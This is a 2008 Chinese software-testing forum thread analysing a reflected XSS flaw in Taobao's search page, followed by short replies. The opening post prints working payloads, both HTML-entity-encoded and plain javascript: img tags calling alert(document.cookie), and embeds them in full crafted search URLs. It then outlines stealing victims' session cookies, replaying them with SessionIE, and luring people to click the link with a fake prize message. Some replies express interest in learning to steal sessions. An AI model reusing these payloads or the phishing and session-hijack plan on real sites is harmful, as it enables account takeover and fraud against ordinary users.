51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 5629|回复: 4
打印 上一主题 下一主题

淘宝xss的简单分析

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2008-8-15 18:20:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
bzcyer提到了一个淘宝的xss问题。
帖子的地址
http://bbs.51testing.com/thread-123477-1-1.html

感觉很有意思,淘宝竟然连基本的xss符号都没有过滤。

这是作者的原来的xss测试语句。
  1. >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(21879)>
复制代码
简单修改一下
  1. >"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>
复制代码
监听http发送请求的过程。
原始的正常请求
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=xxxxxxxxxx&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
修改请求为xss攻击语句。
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
没有成功,呵呵。
忘记http请求会修改编码的,修正一下
  1. http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascript:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
复制代码
这样就已经可以达到xss了。


下一步就是黑客的做法了。

修改xss语句为获取cookie,然后使用sessionIE,就可以操纵他的cookie了。因为快下班了。所以,没有时间继续研究了。如果深挖,可能会有更多的应用。

以后再研究,给一个完整利用的方法。我不知道淘宝会不会有什么限制,比如即使获得session,仍然无法登陆对方的帐户。这就不得而知了。试验一下才知道。

如果可以的话,利用起来就是欺骗了。

将以上的xss连接发送给别人,说是中将之类的,别人点击之后,就会截获他的session,进行一些操作了。
除非,淘宝做了闲置,否则,这是一个明显的漏洞和bug。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

2#
发表于 2008-8-19 10:41:02 | 只看该作者
非常感谢,好好研究下你的文章,最近结合AppScan查了很多类似的XSS,一直不知道怎么进一步的去做测试··
回复 支持 反对

使用道具 举报

该用户从未签到

3#
发表于 2008-8-19 10:48:39 | 只看该作者
现在测试的网站也是的,包括链接里面,可以手工的加上传的参数,然后“=”后面改成脚本。好好研究下怎么偷session~
回复 支持 反对

使用道具 举报

该用户从未签到

4#
发表于 2008-8-19 11:08:52 | 只看该作者
呵呵呵, 又学到一招
回复 支持 反对

使用道具 举报

该用户从未签到

5#
发表于 2011-11-16 15:02:24 | 只看该作者
你们都是做黑客的料!
回复 支持 反对

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-8 22:50 , Processed in 0.075916 second(s), 27 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表